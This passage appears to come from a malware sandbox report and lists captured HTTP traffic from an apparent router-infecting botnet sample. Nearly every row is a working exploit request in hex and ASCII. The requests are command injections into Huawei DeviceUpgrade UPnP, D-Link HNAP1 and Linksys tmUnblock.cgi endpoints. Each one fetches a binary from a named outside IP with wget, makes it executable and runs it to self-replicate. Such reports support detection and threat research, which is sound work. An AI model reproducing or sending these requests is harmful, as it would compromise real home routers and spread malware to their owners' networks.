73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 